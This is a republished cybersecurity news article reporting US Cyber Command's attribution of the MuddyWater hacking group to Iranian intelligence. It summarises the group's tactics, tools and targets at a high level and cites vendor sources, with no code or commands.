Your Yello Ring Road To Success
GOOGLE LOGIN MY ADS MY SHOP

US Cyber Command Links ‘MuddyWater’ Hacking Group to Iranian Intelligence

US Cyber Command

The U.S. Cyber Command (USCYBERCOM) on Wednesday officially
confirmed MuddyWater’s ties to the Iranian intelligence apparatus,
while simultaneously detailing the various tools and tactics
adopted by the espionage actor to burrow into victim networks.

“MuddyWater has been seen using a variety of techniques to
maintain access to victim networks,” USCYBERCOM’s Cyber National
Mission Force (CNMF) said[1]
in a statement. “These include side-loading DLLs[2]
in order to trick legitimate programs into running malware and
obfuscating PowerShell scripts to hide command and control
functions.”

Automatic GitHub Backups

The agency characterized the hacking efforts as a subordinate
element within the Iranian Ministry of Intelligence and Security
(MOIS), corroborating earlier reports about the nation-state
actor’s provenance.

Also tracked under the monikers Static Kitten, Seedworm, Mercury
and TEMP.Zagros, MuddyWater[3]
is known for its attacks[4]
primarily directed against a wide gamut of entities in governments,
academia, cryptocurrency, telecommunications, and oil sectors in
the Middle East. The group is believed to have been active[5]
at least since 2017[6].

Recent intrusions mounted by the adversary have involved
exploiting the ZeroLogon (CVE-2020-1472) vulnerability as well as
leveraging remote desktop management tools such as ScreenConnect[7]
and Remote Utilities[8]
to deploy custom backdoors that could enable the attackers to gain
unauthorized access to sensitive data.

Prevent Data Breaches

Last month, Symantec’s Threat Hunter Team publicized findings[9]
about a new wave of hacking activities unleashed by the Muddywater
group against a string of telecom operators and IT companies
throughout the Middle East and Asia during the previous six months
using a blend of legitimate tools, publicly available malware, and
living-off-the-land (LotL[10]) methods.

Also incorporated into its toolset is a backdoor named Mori and
a piece of malware called PowGoop, a DLL loader designed to decrypt
and run a PowerShell-based script that establishes network
communications with a remote server.

Malware samples attributed to the advanced persistent threat
(APT) have been made available on the VirusTotal malware
aggregation repository, which can be accessed here[11].

“Analysis of MuddyWater activity suggests the group continues to
evolve and adapt their techniques,” SentinelOne researcher Amitai
Ben Shushan Ehrlich said[12]. “While still relying
on publicly available offensive security tools, the group has been
refining its custom toolset and utilizing new techniques to avoid
detection.”

References

  1. ^
    said
    (www.cisa.gov)
  2. ^
    DLLs
    (en.wikipedia.org)
  3. ^
    MuddyWater
    (malpedia.caad.fkie.fraunhofer.de)
  4. ^
    attacks
    (www.clearskysec.com)
  5. ^
    active
    (unit42.paloaltonetworks.com)
  6. ^
    since
    2017     (blog.malwarebytes.com)
  7. ^
    ScreenConnect
    (thehackernews.com)
  8. ^
    Remote
    Utilities     (thehackernews.com)
  9. ^
    publicized findings
    (symantec-enterprise-blogs.security.com)
  10. ^
    LotL
    (encyclopedia.kaspersky.com)
  11. ^
    here
    (www.virustotal.com)
  12. ^
    said
    (www.sentinelone.com)

Read more